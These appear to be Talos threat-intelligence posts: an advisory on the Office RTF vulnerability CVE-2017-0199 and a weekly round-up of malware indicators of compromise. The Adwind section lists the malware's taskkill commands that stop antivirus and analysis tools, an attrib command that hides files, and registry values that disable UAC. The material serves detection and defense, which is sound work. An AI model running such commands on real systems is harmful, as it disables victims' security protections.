Over the past week, information regarding a serious zero-day vulnerability (CVE-2017-0199) in Microsoft Office was publically disclosed. Since learning of this flaw, Talos has been actively investigating the issue. Preliminary reports indicated that this vulnerability was actively being exploited in the wild and used to compromise hosts with Dridex, a well-known banking trojan.

On Tuesday, April 11, Microsoft released a patch for CVE-2017-0199. CVE-2017-0199 is an arbitrary code execution vulnerability in Microsoft Office which manifests due to improper handling of Rich Text Format (RTF) files. Exploitation of this flaw has been observed in email-based attacks where adversaries bait users to open a specifically crafted document attached to the message. Given that this vulnerability continues to be actively being exploited, Talos strongly recommends all customers patch as soon as possible.

Talos has observed several spam campaigns that have attempted to compromise users by exploiting CVE-2017-0199. In one particular instance, Talos detected and blocked a campaign where adversaries were sending phishing messages designed to appear as a "scanned image" coming from a Xerox Workcentre device.

The attached documents were named similar to one another with randomly generated numbers being used in the file name, such as Scan_005_4102974675.doc. Note that while the document filename ends with a .doc suffix, the contents of the attachment are actually RTF-formatted. Talos has observed that adversaries are using different suffixes for files that Microsoft Word can natively handle to evade temporary countermeasures of disassociating .RTF files from Microsoft Word.

Upon opening the attached document, the user will encounter a prompt from Microsoft Word asking whether they would like Word to update any links to files that are referred to in the document.

Unfortunately, due to how the exploit works, click "No" effectively does nothing as the the exploit will have already been run. Most of the samples Talos has observed download and execute another file upon successfully exploiting the vulnerability.

Talos strongly encourages that users should exercise caution when receiving unexpected emails containing attachments. Adversaries will be looking to exploit users via methods such as this, or via other social engineering avenues.

Observed Samples

13d0d0b67c8e881e858ae8cbece32ee464775b33a9ffcec6bff4dd3085dbb575
14d58c0844d12c5def85b8595992e73e7214e6c6b749ed8d015d5eaec90249d7
14e4d9269304d5e92f300adfcc5cc4f65ead9b3898a3efbeac7e321ef3ca3b40
17dfd3747821deb1c89a829c88593764a3a2097fcdb23824c21ef48f66e961ef
1b622bd463172f4fddfb0250d647de796f25487d9fe23e0343bfda64720283a6
1b9723563c662ac577145361e6efc85097ddd7ab69796ced5fdbc8a1d9c6cf71
1c340bbfb9f95ab3f2e0e53ab381877afaa35e276da8e82a7ce779e9663a2c9e
2264b3e47dbacd7c8027570d6d651df50c577003e110d0b996da81d6c7693234
23306c4ab3e725e4b552f5362c47a842e0faf90ca729e7c5746e3e8528e1d9c2
3063b95f558ed3c64d28e1f487b51c0377c20f19400beff1f38d963ad2113382
3c0a93d05b3d0a9564df63ed6178d54d467263ad6e3a76a9083a43a7e4a9cca5
3c9cbe523ce25c33c4da7e19ce91cc9f170ce03d1fa53f27aeb0f67100214f6a
425f4d87857d5813776ba154d3646100b6923c2803d5640c7cb4c21fb0cfb7b1
4453739d7b524d17e4542c8ecfce65d1104b442b1be734ae665ad6d2215662fd
4db72f22b4297158057ec9093154c04861d02cc24f75f4ef7f12c612c6f6dcfc
5a4e7f22d2d3fa7f48db5ea4ef34072fd16465657af2ba8a4f14c04602b6a0d2
5c5c6f8e20e0bdedd2d218d0718b8bf1d909598d2cc760a006838346be85c5aa
5e7f1764ddea586646fee7ba90f469c8ca060a2d80eaa2aea7e204c9aa0a616e
6059d031f6bb2f2442b6f3f56f18637a79ba65000eea14ee357af1471c5d1bbb
64ca94397197d5ac8189770bff60a95bb4ec7441a64b0cb30b6eef35d8d8d193
6da2e59c9569bf07c8ab658032b5b3075a2f4898679ad899233b8ef9571d401f
745d05b59cfa9579a0cb14597748434648ca7536870f242e8c5ac10aa45ec546
78432a4b9a3217edb2a5e2e790f1cabf6e96bfcf2a19dc8b721a293e2dc59d12
792470a756978cbcf27ecce5792918cc6b88ada8c34de1b80cbfc19e69528c7f
7a048f25e3d1a5746a190af7201fc82623685280af127b49ca80ef3ac1718d9d
7a6d430195da8e9f1db38e476c41985bf421ef8215d09290c8472260e4142653
7f2a499891a72b9f3b0923be0f9db490463639166b41a15fe3bf5387df660f1c
85c64c744d30b19fccae6398dfcf43bddd2b3c3796f8c50fc5855a868216b79c
86f632c4ef666afaa753b3e5008443b0be79f3e0d809e140a961592cb75813bb
8e7322080604ac3c2094c8cf1bd044e163e3f3ca5100e237a03ef7f7c8aa6c9b
9aa5aa06f94066b28da8a0a146aa8d4933e1df8b006f69fa16925156d54257b1
9b084feac125dd1c4c8dba4621ec9c607250f9889cb1b7448238f9fe9192d2ab
9d9c6b651d50afb853cb7e5c9819ae89d871c4311cb5982f852775ba82f9f24a
9dc7deb92b68dc7eb6c50226b1d8281ad517cc06ddf5d0732f6fab343aa70738
a00bb4c41272dc67f92ec0a6c5cec7b606d44382b7637523be8dc5ca2e320fda
a7fa6e64286134448b369e4241798907eb9afd01d4024d51bc3a2790c453dd15
ac968aa2e3a034daa4f066f3755da82fb0bd5bb5c59b26bf1b111ee20c34e501
ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e
b128f58594b5c6371bf4245d7fb6fd2b1fd61fdc1f4cf0811356194d6903495e
b1590276f37e5fc2aacaaa4d0f6e16b74421623353bdaf14b296e6778d3cc655
b3b3cac20d93f097b20731511a3adec923f5e806e1987c5713d840e335e55b66
b42ba25763ae0166c23353200e4e84480924cd0bee60b9ae87314d9c1be6288d
b807b93fbe9f39477d875c269bab1325e97672f467ce16cd6e10d2f1f6d4f071
b9147ca1380a5e4adcb835c256a9b05dfe44a3ff3d5950bc1822ce8961a191a1
b9b92307d9fffff9f63c76541c9f2b7447731a289d34b58d762d4e28cb571fbd
bd9e3c2def719de0a5e41ea84a64d20cf1140d34731788c3d1f91940dfafad16
c98f34e4e87f041c3f19749bbb995bfcd2e3de20c2ba619ea4a0ed616ac1b629
cd31709d3e5f0ad0a1cd16d4d2fd01947dcccaacf98e38cb7afb72c94fe29413
ce926763c053e6f9a637cfd86c2312de012d1618eb1cc86b421e5dc5a117c125
d134a40a2e4c04e822983b6ac9f0b85506b3f2402234de696bdf3be662bb651a
d1ca07a3bbe7ce33821ac8b73eefc2d87f72293a6c9c95ac427c41593ef92d9f
d3148d2189b148d8d8cb63976509fd6abc186340cbcf29f68f5370d536fbe5c9
d3c3b2e6681ec812a9df035954aa3aa82e463dfe226afddfa6f534e2a07a057c
d3cba5dcdd6eca4ab2507c2fc1f1f524205d15fd06230163beac3154785c4055
d70851f30c94f5a3abb7a4e7557777733cf507bc9f98632867e3c55ce8e2b7b2
d9dcff78d334c3bc459f0e58209d77693384ede7db761ce1928daa50a4f14273
e20368cdb4c96c95066073a07b9941d010822fde033e51529a8d26900413f371
e7f3eb567583bc85a1a002e5d289d526bf4c16b7ed356d9973ff458b7635e072
e9339747b31f576e6d4049696a4f4bd7053bcd29dafb0a7f2e55b8aab1539b67
e9da2fa0496c4fe5d749767cbda82b8838a94384b2ddf6389a946e2ee7e36edb
ee71a6191a1c9cc89c91ead19e1291e7e743d40740aeb4e3278cdd673f879b81
ef43da73da325b2b68feaf7d709fb30e4eb3f74e4750a6507bebd925fa1c41a9
f4a0f65e9161a266b557e3850e3d17f08b2843ee560f8a89ecf7059eba104e66
f59b1ca8ad354b66b95d36712b331dc4b9d152ee564c504c8f4f33add6da360c
f8f7cbd257329af8d7ab6c3736ddfcaed1af658197a8e94a2422c823b55c43c9
fc1bca6aa87ee0e075cc11cdcdfb9dc3dd22e42a45c71a4caa03362b9d477782

Malicious IP Addresses

63.141.250[.]167
64.79.205[.]100
95.46.99[.]199
179.108.87[.]11
185.44.105[.]92

Malicious Domains

btt5sxcx90[.]com
rottastics36w[.]net
hyoeyeep[.]ws

Coverage

Coverage for CVE-2017-0199 is available through Cisco's security products, services, and open source technologies. Talos will continue to monitor the situation and as a result, new coverage may be developed and existing coverage adapted or modified. For the most current information, please refer to your Firepower Management Center or Snort.org.

Snort Rules

42189-42190
42229-42231

ClamAV Signatures

Rtf.Exploit.CVE_2017_0199-6231737-0
Rtf.Exploit.CVE_2017_0199-6268975-0
Rtf.Exploit.CVE_2017_0199-6268975-1

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of malware that is downloaded by documents exploiting this vulnerability.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network

↧

Threat Round-up for Apr 7 - Apr 14

April 14, 2017, 1:58 pm

≫ Next: Cisco Coverage for Shadow Brokers 2017-04-14 Information Release

≪ Previous: Cisco Coverage for CVE-2017-0199

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 7 and April 14. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

Java.Trojan.Adwind-6260775-0
Remote Access Trojan
Also named AlienSpy, Frutas, JRat… Adwind is a java based Remote Access Trojan that is usually distributed by email. Given it is Java based, it is portable across different operating systems and even mobile devices. It allows to capture keystrokes, record video and audio, steal cached password and stored data, etc...
Win.Trojan.VBSinkDropper
Dropper
This sample is written in Visual Basic and its main goal is to drop and execute a second stage payload. The domains are related to the Zeus trojan, indicating this is probably a Zeus variant. The sample is heavily obfuscated and has anti-debugging and anti-VM techniques to hinder the analysis and performs code injection in other processes address spaces. This sample is currently delivered in massive spam campaigns as an attachment.
Win.Trojan.AutoIt-6260345-0
Trojan-Dropper
The initial binary contains an AutoIt script. The script is obfuscated. It creates several in-memory DLL structures with AutoIt’s DllStructCreate and DllStructSetData. The script then executes the shell code injected into these DLL structures.
Win.Ransomware.Cerber-6267996-1
Ransomware family
Cerber is a popular ransomware family that continues to undergo active development to continue being dropped in the wild. It still drops multiple ransom notes, including a desktop wallpaper as a warning post.
Win.Virus.Hematite-6232506-0
File Infector
Hematite is a simple but effective virus that spreads through executables. It scans the victim’s machine for any files with the extension .exe. Hematite appends 3000 bytes of malicious shellcode to the end of each file, then modifies the entrypoint of the original executable to load and execute the shellcode.
Doc.Dropper.Agent-6249585-0
Office VBA/PowerShell downloader/dropper
This sample is a Microsoft Word document that uses a macro to launch a PowerShell script to download and execute a secondary payload.
Win.Virus.Sality-6193004-1
Windows file infector
Sality is a file infector that establishes a peer-to-peer botnet. Although it’s been prevalent for over a decade, we continue to see new samples that require marginal attention in order to remain consistent with detection. Once perimeter security has been bypassed by a Sality client, the end goal is to execute a downloader component capable of executing additional malware.
Doc.Dropper.Dridex-6260340-0
Office Macro-based Downloader
Dridex documents leverage Microsoft Office to deliver a malware payload. They have been used often with banking trojans and ransomware such as CryptXXX and Locky. This week Doc.Dropper.Dridex-6260340-0 has been delivering Cerber as redchip2.exe.
Doc.Macro.CmdC-6249572-0
Office Macro Obfuscation Heuristic
Office macro code is used to further compromise a target system. This heuristics focuses on macro techniques to obfuscate shell commands that will be executed to further compromise the system.
Js.File.MaliciousHeuristic-6260279-2
JavaScript Obfuscation Heuristic
To make javascript harder to signature on, detect or to manually analyze; obfuscation is applied by breaking up functionality into small function.

Threats

Java.Trojan.Adwind-6260775-0

Indicators of Compromise

Registry Keys

MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[application name].exe

Value: MAXIMUM ALLOWED

USER\[uuid]\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

Value: [a-zA-Z]+
Data: "C:\Users\[user]\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\[user]\[a-zA-Z]+\[a-zA-Z]+.[a-zA-Z]+"

USER\[uuid]\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\ASSOCIATIONS

Value: LowRiskFileTypes
Data: .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;

MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE

Value: DisableConfig
Data: 1

MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM

Value: EnableLUA
Data: 0

Mutexes

IP Addresses

174.127.99[.]134:2888

Domain Names

Files and or directories created

\Users\[user]\AppData\Local\Temp\Retrive[0-9]+.vbs

Others

Kills AV solutions / security tools

taskkill.exe taskkill /IM K7AVScan.exe /T /F
taskkill.exe taskkill /IM V3Proxy.exe /T /F
taskkill.exe taskkill /IM mbam.exe /T /F
taskkill.exe taskkill /IM text2pcap.exe /T /F
taskkill.exe taskkill /IM FPWin.exe /T /F
taskkill.exe taskkill /IM FSM32.EXE /T /F
taskkill.exe taskkill /IM cmdagent.exe /T /F
taskkill.exe taskkill /IM ClamWin.exe /T /F
taskkill.exe taskkill /IM MpCmdRun.exe /T /F
taskkill.exe taskkill /IM V3Svc.exe /T /F
taskkill.exe taskkill /IM GdBgInx64.exe /T /F
taskkill.exe taskkill /IM freshclamwrap.exe /T /F
taskkill.exe taskkill /IM rawshark.exe /T /F
taskkill.exe taskkill /IM MsMpEng.exe /T /F
taskkill.exe taskkill /IM PSANHost.exe /T /F
taskkill.exe taskkill /IM NisSrv.exe /T /F
taskkill.exe taskkill /IM BullGuardUpdate.exe /T /F
taskkill.exe taskkill /IM procexp.exe /T /F
taskkill.exe taskkill /IM nfservice.exe /T /F
taskkill.exe taskkill /IM VIEWTCP.EXE /T /F
taskkill.exe taskkill /IM K7TSecurity.exe /T /F
taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
taskkill.exe taskkill /IM QUHLPSVC.EXE /T /F
taskkill.exe taskkill /IM V3Up.exe /T /F
taskkill.exe taskkill /IM CONSCTLX.EXE /T /F
taskkill.exe taskkill /IM K7AVScan.exe /T /F
taskkill.exe taskkill /IM MWASER.EXE /T /F
taskkill.exe taskkill /IM K7CrvSvc.exe /T /F
taskkill.exe taskkill /IM editcap.exe /T /F
taskkill.exe taskkill /IM LittleHook.exe /T /F
taskkill.exe taskkill /IM ProcessHacker.exe /T /F
taskkill.exe taskkill /IM cis.exe /T /F
taskkill.exe taskkill /IM MSASCui.exe /T /F
taskkill.exe taskkill /IM SSUpdate64.exe /T /F
taskkill.exe taskkill /IM mergecap.exe /T /F
taskkill.exe taskkill /IM FSHDLL64.exe /T /F
taskkill.exe taskkill /IM AdAwareTray.exe /T /F
taskkill.exe taskkill /IM guardxkickoff_x64.exe /T /F
taskkill.exe taskkill /IM econceal.exe /T /F

Hides files in the filesystem

attrib.exe attrib +h "C:\Users\[user]\[a-zA-Z]+\*.*"

File Hashes

e084341b5149d62ebd26f311e51725d3e630f5d1c154568b717d79aa0b72c441

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Trojan.VBSinkDropper

Indicators of Compromise

Registry Keys

HKEY_USERS\Software\Microsoft\[a-z]{5}
HKEY_USERS\Software\Microsoft\Windows\ShellNoRoam\MUICache
HKEY_USERS\Software\Microsoft\Visual Basic

Mutexes

IP Addresses

191.96.15[.]154
154.66.197[.]59
191.101.243[.]203
108.170.51[.]58

Domain Names

afrirent[.]net
ogb.mmosolicllp[.]sk
norlcangroup[.]com

Files and or directories created

C:\Documents and Settings\Administrator\Application Data\Xoabhaul\[a-z]{8}.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\subfolder\[a-z]{3}.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\Purchase Order.doc

File Hashes

Please note this is an non-exhaustive list.

00062f3d06aad63d025c8097e0bc024f23ede453751afdae0e1cc5b40f987bf6
0094bcc3a70b00b2b61701a90ac2c15f3d39551adcf18b33cafb6ad8a732825c
029a6ba06418d2cc2ee9e7dbbcca622b206df8a1855fa6e551c6126f07302030
03580fcc6fa4d72a39b876067ae9a7c9b9c62b1a53175df0f54a2a47deee6691

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Trojan.AutoIt-6260345-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

The malware copies itself to %AppData%\driver--grap.exe

File Hashes

e6ea4d5f3bc4b53ec4777f5da3105d75cd53dd6ed4f0497b52f09f79e7183891
7d05f85efe8f289d43cc3515c2399e2c8d1bfbf082fddaebaf3c9c6dcea6381d
5eafd63e278510033918f63f34dae687f7a19d1fc04b479ebc09c507037409ef
5fdb796f505f40a0a9add787776f12ddb02edd310ae24c9d4bd5d149fa0602c8
65f372559761f703622fbe2d433f5bb92752d3cb5e17966ef987c5b40a03010d
9c4be24f3245e733890ac12c8a9e2fe2a0e3be31df16edf86354cd80eccc3e95
a204c517252f0fb7994d4472bf0090182054825822a9d29ecb370df7c8f0d3ba
f7667ff6110302df2855156ad8f93e998ce646109568d443a4aac514cab71edf
9b816ef40eb06982b227beaf91c2eb9bc352c915632638972f3af1c3cbb29fa5
5d3324155753948adf84a3f8f0c9d69dc272929d66e294faf54689e4537c15f6
0fa2383f17d23286efee1062322964550636add6d2ceba1abbeb87aead6c1649
d69224eeda882e34339f5f785181f49e074c3f07444d8daeaf27dfddea19cee6
503ac78c383a62d207512e361af07e7be279d64237c456eb376825485a1f5dc3
25bf3a2df95236cce230163e9929dab6b01242be6364c6b3de186cff8e8883df
dadc2e7ea2fb8cb732a3baae2d0b2978d0ee9398d8e8c12f20a2e3ede7752045
6157a7293e25ab26fa360f11f1b84abe44f62f363fc284af2a2787cfb6aa4a0e
7616cdc6a6619685e5a6a1534264a988f14add3192bd3fb467dce54234635026
613770d0d5a1f8d8bfa39cb52bd2c4357aba183afd9ecc5c3c238e5a0aea3d8e
f8d0bac2dfc3dd7e16905497b427391f7887effe1ae3e3276411d5c13c416ca1
fd55686aab2686c4af73dbac6959cbf26e4c24fb83953d7495cc680d48d73754

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.Cerber-6267996-1

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

api[.]blockcypher[.]com
hjhqmbxyinislkkt[.]1efxa8[.]top

Files and or directories created

%USERPROFILE%\Desktop\_HELP_HELP_HELP_[A-Z0-9]{4,7}_.png
%USERPROFILE%\Desktop\_HELP_HELP_HELP_[A-Z0-9]{4,7}_.hta
%SystemDrive%\_HELP_HELP_HELP_[A-Z0-9]{4,7}_.png
%SystemDrive%\_HELP_HELP_HELP_[A-Z0-9]{4,7}_.hta

File Hashes

Please note this list is not exhaustive.

04abd9e0fe7d1ea53836de6429bdca8f2db992e203675e0dc36b75355fd0432d
0b9cbc73f23208828a6c92fc85cadf31e22fe0b8852a100f72418394de455854
6f93a071e1b7f33f62cb0ebdade39826d1fb2539dfe3d3bb5329f1b05f01d2d1
37e6f3b2a5228e10564bafcec2ca700359d5e9265d6f6d1c57a275007760876b
01eb9e772dcae43eb4c8d23c69775dfe18ec133b2650663a81f40861728dac4c
09e6190ac04db46f1463c539a80973d9de17de23fc11a87adcc59a78950df342
648f4e50848a55deb1c51fa8d82674bc7dbf3c630c6b6956c015258157736389
07514ea42b4da1110166369fd3ed806189f3c3731717e51dfb5f2835a0fbf6bc
635007aedf337778cc75d4dc51e25041b89faa06c91a40378d86224dd1230e36
4cf1591e9e49d796183ce7a55420cd54681afbe1ebfe6e012cceb35f74c75dbb

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware Screenshot

Win.Virus.Hematite-6232506-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

File Hashes

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Dropper.Agent-6249585-0

Indicators of Compromise

IP Addresses

217.23.12[.]111

Domain Names

Files and or directories created

%TEMP%\uuqjd.exe

File Hashes

79fb46efcdff1f2e5ab8114f2e4d27de56d72ef2b01664870108793663b1c85e
1007936720cdcb884a675912ee552d13d7e2a9c77fdcb7602380f5b789c55354
79fb46efcdff1f2e5ab8114f2e4d27de56d72ef2b01664870108793663b1c85e
89847e43aec98d5f80488b6ed609dfc50fab8df248267ae9bd57de4d5fa4815e
ebd2775940368bcbd9717bac69f68fa53012013bf4091d2a8506df1cf82a7ce4

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware Screenshot

Win.Virus.Sality-6193004-1

Indicators of Compromise

Registry Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc
HKEY_USERS\Software\Fobvexllmtqkq
HKEY_USERS\Software\Fobvexllmtqkq\-993627007

Mutexes

\BaseNamedObjects\xx19867861872901047sdf
\BaseNamedObjects\winbmcavr.exeM_584_
\BaseNamedObjects\uxJLpe1m

IP Addresses

94.76.225[.]131

Domain Names

Files and or directories created

%SystemRoot%\ab4f7
%TEMP%\winksbq.exe
%SystemRoot%\rugrijfnvpkmu.log
%SystemRoot%\system32\drivers\sfmom.sys
%SystemDrive%\kojchn.exe

File Hashes

cf3eda07e7394abcd11b9d63e9489c8c5ef9d799d79f111e78aefeed44136475

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Dropper.Dridex-6260340-0

Indicators of Compromise

IP Addresses

104.41.146[.]46
13.65.245[.]138
13.65.245[.]138
131.107.255[.]255
134.184.129[.]2
138.201.223[.]6
143.95.251[.]11
184.169.138[.]0
185.20.29[.]90
185.75.47[.]96
185.82.217[.]110
192.254.183[.]111
208.113.184[.]69
208.115.216[.]66
212.19.96[.]44
213.98.59[.]242
27.254.36[.]68
37.152.88[.]54
40.84.199[.]233
52.178.167[.]109
59.188.5[.]122
64.111.126[.]184
72.13.63[.]55
72.52.4[.]119
74.209.240[.]161
82.208.10[.]231
85.114.146[.]10
91.121.36[.]222
91.215.152[.]210
93.184.216[.]34
94.23.19[.]56

Domain Names

abcdef[.]hr
animo[.]br
dva[.]hr
ektro[.]cz
emaiserver[.]ro
fafa[.]pk
fb[.]cz
libertynet[.]org
litwareinc[.]com
musical.com[.]br
negdje[.]hr
orice[.]com
philteksystem[.]com
pirajui[.]br
poveglianoatuttogas[.]org
ppp[.]ro
princehkg[.]com
proseware[.]com
quatro[.]br
rockgarden.co[.]th
tek-astore[.]cz
villa-kunterbunt-geseke[.]de
vlada[.]hr
vub.ac[.]be
www.offertevacanzeshock[.]net
www.philteksystem[.]com
www.soulcube[.]com
xara[.]pl
xyz.com[.]br

Files and or directories created

redchip2.exe

File Hashes

01b12a002debc9820f93b6a9086412c19e1f6d9668673cc2cc1f6c93aabfd8d6
049bc0d32a6b918ca4fd65cb183bcb2c0ff06628d4fc6c42ae092d0ab0be7604
0c7f7dfc2b6945f46b96c8c62aa0fd9f9694fe9645ce6be52d85788ff687e76e
0cfdb3ef99de18a48291ad6a900026b788e40045cf2ab84f84297a1a5df06623
0d493c55eb56321b022dcac836ea01e5b0ea29610bc8690baa979e14580d50b1
1084f2ecde7fb1be955cf465854439843e9a4e8ac8ff85232b6d1bf1fff4839b
15063800322f6fa377dcc9b21a7283174922ab37cb84e519cd838fc76bb70eb9
1678fe4b970b78989ca8abe3c830f4e110b6bca57de4ac701e7aee3b28dc6360
167ed42bfeeed279d6d6633b3e4f449fbc8ddd6afb3c71ecf004d04d8196cd3e
176722ee68098d6e3788c61b901976692b506b3ebc4ef750e4358c14ac764e5b
17ae9aac1dcea2d5a134393fc8b0a764f5e0c6844a8cea57ec76e34e7ba9d28e
1b7210dce366e228d20cbe1ce61d9970f1668a16e5c49a98fd7cda941a424250
1bc207f9a7d0934afbd74bd1283ce6479ab11354406428c798432992f88af579
1cf1178bb1a391756fab1273c62fec1be4b594ace355da3e71c45c74a92a0870
1e5da3edef25c914e15b40f8b3e435eb462acfed2a15167c9a7ad6c9180def05
1f490a190ef296c8cd6cd2df5eb4671e02b5c3de39059bd98e4216bca08dedb3
24f6690360a0f839b14fdd4620f56f72380b0bf086b130a1921640212d2ab716
2647e99046ec808e3aafe5cc1764902888b75acc89d8126545c0d37a56d85dd8
28a91316512591938857a4264396f775851a2e7a25f6dff665057ae95e06dd8c
28ab7ec22ff42b301c6336b9aaa53bb3aace63675e93eb7907c1680d7936f331
2b3f8964155c237e9ff28d505e0756e1873ed9f2e56f04b8dbe6862e188b1a4b
2dba0ea599270832f5b88fbe71c7795ba3c36a44ab573a157b615b93c78cf389
2e0683cd448ed61994e38789224545963a37d59dbaa49f4f24a3740674d4ec12
30924070e951f97dee75990fe0a9651d8a87267e511f6172ca5ec3446dddb02f
38898c7d496439e9e5da5e4cc40d65aa5fae348085f2406b66810be14cb7e47e
3c35385c0fe82b7f62fe95ba73aa9e4ff8d22a4193d59c11ff262650cb5f27cc
3db4d968b4dff8a15379d9f2e0f1084c96d8d480dbf7ad53e7e9e8e47899a727
3ff9e1394bd51320bb30280575913d91783a6b9f63f5d4b739851726f0ed8f01
402a54cd56f699250064032c71e27a2a981affdf22248cc59a2599c6407d94d5
4202e58c98095862c4bcdbd55c98b42788d951879f7f82341dca213a1524ff0a
46080bd19531929fa0bef917ed8de88946cd4029eaaaaf9fc593514ff9384e49
49119b680f9fedb19b9e1b36046b12d05ebbee4ef1040b33b9e1e4afcd38c3a1
493cffa37b28beee9e404b48ab82953a61fe1bdfa41b68ea34336b817eec6438
4d1960e5b18624f8ffe659719a6af49806a661abc4776fb9da173907105a0016
4f13124b24c71e2d8c551f9d5123aecd49b5632cedc93d0b8a8ebc4adf244270
5262369be5e983a682c9bb59fbbef0fc3dfc98feaf85278a319fb026fec93cd1
55bb1ea2b1504d28fc397543e55f3c301fb58803d4e8448a38f53ba29d24bc9a
57bf408c7525458ed58ae59dc57a7d0574cb6b453ab2e3e735ab93a94db61471
584c8bfbf964695949fcd0c8a66e0beb1d4803afe4977e504c721a7ce38e97a0
58c52566376771654ec4bd135c92ee7fe03795b1dc4f81e0609f4252f803e889
14230d3e19cbef146e83bc7e6bed4f08eb8857a8a11765a09dece6458cf998d5 (redchip2.exe (Cerber))

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware Screenshots

Doc.Macro.CmdC-6249572-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

gosterd[.]pl
ywkl.nonfect[.]com
etesusozim.nonfect[.]com
urojab.nonfect[.]com
abap.nonfect[.]com
knygobynuwa.nonfect[.]com
ohpkyxij.nonfect[.]com
ofinepi.nonfect[.]com
asode.nonfect[.]com
otos.nonfect[.]com
egaqf.nonfect[.]com
djirus.nonfect[.]com
olyfabe.nonfect[.]com
yloked.nonfect[.]com
ydgnucif.nonfect[.]com
ygudu.nonfect[.]com
ovislragil.nonfect[.]com
onem.nonfect[.]com
ybelikyvygo.nonfect[.]com
ijezqqwgamy.nonfect[.]com
ytijaboqo.nonfect[.]com
ogazedy.nonfect[.]com
ucigudago.nonfect[.]com
omisagirul.nonfect[.]com

Files and or directories created

%WINDIR%\hh.exe
%ALLUSERSPROFILE%\<random_folder_name>\<random_file_name>

File Hashes

8f314f6773f6ef4af43432c49756c9a4af32b2fe0e0ca91937972728421ea1b6
318cb81cf8ee609f8a6a8e8866bf4bc48013c6cf75ecfb1d806c523afbd3589b
a5f0aaa5e33615ab666d92b3542792d2be582bf6b0e8f3c0d2bee86ecbe552d4
741d5e7d7cc13a496440c26b1bbe0080307338e9e419a154470855a5b1157ba3
85d1f6ad4c4babe1a5bbde3d583411142e6cefa60631f8a5f3f7b823a107b51e
99f8c220519c82de58ddf609cd5de57b6542addea00213e068030d2c5d9d6763
00abd8fb0560766aef3dd884677a643244e56b03c3a4b82dea6d79d7d2f04a29
e12e25b9871268adb4540ed866f47d653632d85fcdcc737ddf69e99e1bc9782c
61d68dbbed963678323be37753159f381e0c21e8c56fc8cbd1acd3ea5c669e12
64d03eaa413a3efae12a4f72967b64625afaa0f01caf69349377795683a0c79f
76a0bfa693a9d7c312c36050ff497aaa0d423a6f335ff204d4c8334d3cc8be8f
253f451f36a49e093191e5583cf4a3041407082168b29299429e66d968a186ba
c0982749d0bef7b337f4f737f683a6ba63794ada050adfec2d094b7e55ad4355
ea8619a50fbdd60b797880fbd725e6d0e495d23447d365a31076837058b982ce
873166cbaa52eb4e24d96097de6f5b3322012f8e4aacdecf380476624e909b6d
a81534f11ee7875199487f926a96b53af265afb7f96e97bdb0c477d3d18c4614
e62f33ff3c59c1f4ac633e228a3693e7a9f3eaf0385a41633e24dc4260d683b1
215dedd739516fb6054d0b6cfc0863c9f71c56479521362fd0e088536efd4191
39ed73fe10a6aa325322399c0038a8e405a27a66cf740c975418021efa5da457
3c574a5e6e8994691ee39855b85fba9d961ce807e77b65093fa875292da1d5a7
5ac4f7bd73fbf822c5e5e7a319776c1b79593b7604fae84c0598a1d2e99a567a
6a24dbe8aeabcaea4bc9454815751037cfd1da4a82359b830df93eb67452809e
6f34227aa29d33d4e7b853743818006900bb9df39cf3e6bd86cf7a1836b9a2d9
a1e1dd4ed46ccb95b2f95ad57a582e7df8422e4c2ebdf853356701b6ad6cc2e2
b42f91110d802e4363ce9664d5401f84beb08328c8e8d81a50290f49758ba434

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

Js.File.MaliciousHeuristic-6260279-2

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

File Hashes

18ec2f58ca800b00e0abc6cb7235a3caa65d120ba1fe14ad8160c3c3f450e19a
352540dce31dc80bd938fc90a06322b8fcbb2e1db7a76d254eabc93cca4e9a5e
4bb8119527c8da29ce70926efe15fed0305a3b9518da40f9551ee62606f3dccf
5a6526a7753245fc0837ea3b8a536fd5e587dafa3aa2fe58e58f69132404639d
5fc98c58ee911fad22e27203b649d78ddff67503357038c0c7a2733ebe70d8e0
